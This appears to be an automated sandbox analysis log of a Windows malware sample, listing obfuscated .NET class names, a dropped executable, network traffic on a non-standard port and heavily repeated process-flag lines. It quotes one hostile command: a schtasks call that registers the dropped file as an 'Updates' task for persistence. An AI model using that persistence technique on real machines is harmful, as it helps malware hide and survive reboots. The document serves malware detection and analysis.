                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, pCP4HxzZW8CO7UhW4b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'avHrWFlh0d', 'yGnrA1SmfG', 'Idvr4yg2Lm', 'lawrSDOh11', 'jb8riH3P8J', 'csirrVabpB', 'kOHrBkAl1U'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, a82EhBMtPHAWTw6PSNj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'igwBPIQfJV', 'eWIB6ZFb3J', 'fJ1Bdd6ono', 'lrfBHjLgb5', 'mDJBOseQLE', 'MRGBZLgwXe', 'vKBBblkd0c'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, aP41Rb2MU9RkwkW9m8.csHigh entropy of concatenated method names: 'AOVo8m7tyv', 'ftyoIvqwfY', 'zOCo0uEWf1', 'pDcoqIo4Gn', 'zK3oxVfGSH', 'J8f0OpkmhJ', 'zXX0ZuYHmV', 'nni0blgEwu', 'Jvo0yiG5To', 'wTC0jM2vom'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, zXJkGHjlbtYbCtf16P.csHigh entropy of concatenated method names: 'GMUi2l0yjI', 'KXgiwpIypI', 'wjTiQhFeZ7', 'GkYiGn0vOL', 'nZ9iP7Zvt2', 'g7Einf9REf', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, JdhmicVP8EU7GciB18.csHigh entropy of concatenated method names: 'l26qf89fwX', 'VudqhaVUg9', 'KAbqmSuyGm', 'hpIqCGfENk', 'UFFq1TlwvE', 'cbMqsbEXP5', 'mPZqLw65nT', 'y2Aqa3mQ1G', 'TJ6qvFmjc5', 'mbYql8QwMe'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, RdaVC8vAVRBSh8dNl4.csHigh entropy of concatenated method names: 'GE9pCZ3tRK', 'thVps9ROyc', 'XLupaO1JWy', 'FZWpvD7KCE', 'BIipAGJX9Z', 'KWdp4HoDJX', 'A8BpSVswg3', 'NmjpiVA4AG', 'SJjpr4tvKW', 'vN3pBL6Ma2'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, FYePTKPppX1pL8MWjG.csHigh entropy of concatenated method names: 'rWQA9up4cr', 'LVRAX6Jg1U', 'L7XAPwv0HU', 'XWQA69mPa3', 't6cAwCh6uG', 'd7lAQdTwcV', 'Fs5AG9aMlw', 'XlnAnCsmYw', 'ehCARJkrw3', 'wyxADRnJb9'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, tluVmiTalSJc5mJhQH.csHigh entropy of concatenated method names: 'DdZMqjapGc', 'saYMxOORK0', 'eAVMgRBSh8', 'SNlMc4iwCe', 'FBiMA4cKP4', 'BRbM4MU9Rk', 'eM5GP4V1Zb9XLv3fk3', 'LeArr5yYMCtgPgfnvq', 'wGnMMj5Cuo', 'GxcMtHd0Qw'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, UjapGcaBaYOORK0HUJ.csHigh entropy of concatenated method names: 'fUnIPfN6KE', 'OANI6yyO0R', 'YyhIdLpkRG', 'XbIIHRwHQx', 'SYwIO5it7h', 'JxLIZDgoo1', 'm6SIbqNa1M', 'yN6IyuOR1X', 'BsvIjURsKx', 'xYJI5SVfUQ'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, v3grVy54o4iBnIfO0H.csHigh entropy of concatenated method names: 'VQfrM1ZIkn', 'M9Art6V3wp', 'lG3rTnisVp', 'mTgrkxX4YY', 'sX5rIww28C', 'Pj0r0lGLy2', 'YoVroKgYA0', 'axoib4csW5', 'fORiy04hjC', 'YkPijmllee'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, rwCepLlUfgLqGlBi4c.csHigh entropy of concatenated method names: 'fyV01Zgm3Y', 'pxr0L2YODB', 'nmjpQ6Uiqi', 'q0spGIga7J', 'MAVpnG5wSy', 'wfJpRWn7pu', 'HBspDAvkRZ', 'aL0putu1Dm', 'BdapVvaTBe', 'Nqqp9kvejt'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, oTb2dLEqtrBQAnuZf0.csHigh entropy of concatenated method names: 'Qn7WakdZLU', 'mfyWvqdDnB', 'BbuW2RFxoe', 'FeYWwdxpTb', 'F0YWGT2n61', 'lghWn7XUvR', 'Q6nWDTjMn9', 'sPuWudnvhG', 't7xW95NIE8', 'cmMWNP8x5f'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, miXaaIZp9TTYEDwgGH.csHigh entropy of concatenated method names: 'vqsSyaci7G', 'W6SS55GCg5', 'ubZiKHWEAA', 'ECRiMkdT2U', 'jS9SN4rgln', 'HPySX13SSB', 'FqLSElSvpu', 'ncvSPYfxmx', 'swXS6Mus2t', 'bE2SdwhRLQ'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, cUrp35yXQ3c5piSn2O.csHigh entropy of concatenated method names: 'vcvikcA4xm', 'WPNiIJrHDL', 'Oe6ipbJnV0', 'b2ti0ndErL', 'kVhioIExc3', 'c0NiqNmc1l', 'CNPixDwBYD', 'oDOie4Lcr9', 'KOdigWsMPP', 'wbWic3bRke'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.csHigh entropy of concatenated method names: 'rckt8ETmD1', 'b23tkvnnO9', 'UtMtI5poFs', 'xDXtptB6BW', 'qvut06vYMO', 'QTMto0cXRp', 'E3VtqWNCku', 'lfFtx7thyx', 'JBFteBlSSW', 'xGYtgoLZ5m'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, d5xGCIYeXrCGF0aQYG.csHigh entropy of concatenated method names: 'sOdmyEy3M', 'tPoCB4cGo', 'iGmswyXPR', 'xemLrw0bd', 'W7WvXMhFP', 'MtFlKlvcO', 'rtwlEg0CrIUNCi3Pg0', 'o4x3xsjM4vlTxBwGDk', 'HjQGSnCvcbtHkH1unr', 'rSfiBLOYw'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, vI0bFBItbBVmhEGKUA.csHigh entropy of concatenated method names: 'Dispose', 'IpfMjpIkxZ', 'GBiYwWLOlE', 'sC0ggCZRqc', 'htUM5rp35X', 'I3cMz5piSn', 'ProcessDialogKey', 'FOhYKXJkGH', 'FbtYMYbCtf', 'B6PYYF3grV'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, teGgZqMKAB1ymEk7wmJ.csHigh entropy of concatenated method names: 'LGJrfcoH0a', 'uLWrhP4b7W', 'yvLrmMjBQT', 'zyMrCyDj13', 'LV2r1QCFw5', 'AmkrsOR1hn', 'GdfrLEFMuP', 'xg9rara6pU', 'a2yrvo1HpB', 'stsrlAOLZ7'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, pCP4HxzZW8CO7UhW4b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'avHrWFlh0d', 'yGnrA1SmfG', 'Idvr4yg2Lm', 'lawrSDOh11', 'jb8riH3P8J', 'csirrVabpB', 'kOHrBkAl1U'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, a82EhBMtPHAWTw6PSNj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'igwBPIQfJV', 'eWIB6ZFb3J', 'fJ1Bdd6ono', 'lrfBHjLgb5', 'mDJBOseQLE', 'MRGBZLgwXe', 'vKBBblkd0c'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, aP41Rb2MU9RkwkW9m8.csHigh entropy of concatenated method names: 'AOVo8m7tyv', 'ftyoIvqwfY', 'zOCo0uEWf1', 'pDcoqIo4Gn', 'zK3oxVfGSH', 'J8f0OpkmhJ', 'zXX0ZuYHmV', 'nni0blgEwu', 'Jvo0yiG5To', 'wTC0jM2vom'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, zXJkGHjlbtYbCtf16P.csHigh entropy of concatenated method names: 'GMUi2l0yjI', 'KXgiwpIypI', 'wjTiQhFeZ7', 'GkYiGn0vOL', 'nZ9iP7Zvt2', 'g7Einf9REf', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, JdhmicVP8EU7GciB18.csHigh entropy of concatenated method names: 'l26qf89fwX', 'VudqhaVUg9', 'KAbqmSuyGm', 'hpIqCGfENk', 'UFFq1TlwvE', 'cbMqsbEXP5', 'mPZqLw65nT', 'y2Aqa3mQ1G', 'TJ6qvFmjc5', 'mbYql8QwMe'
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile created: C:\Users\user\AppData\Roaming\LjGABleGAy.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
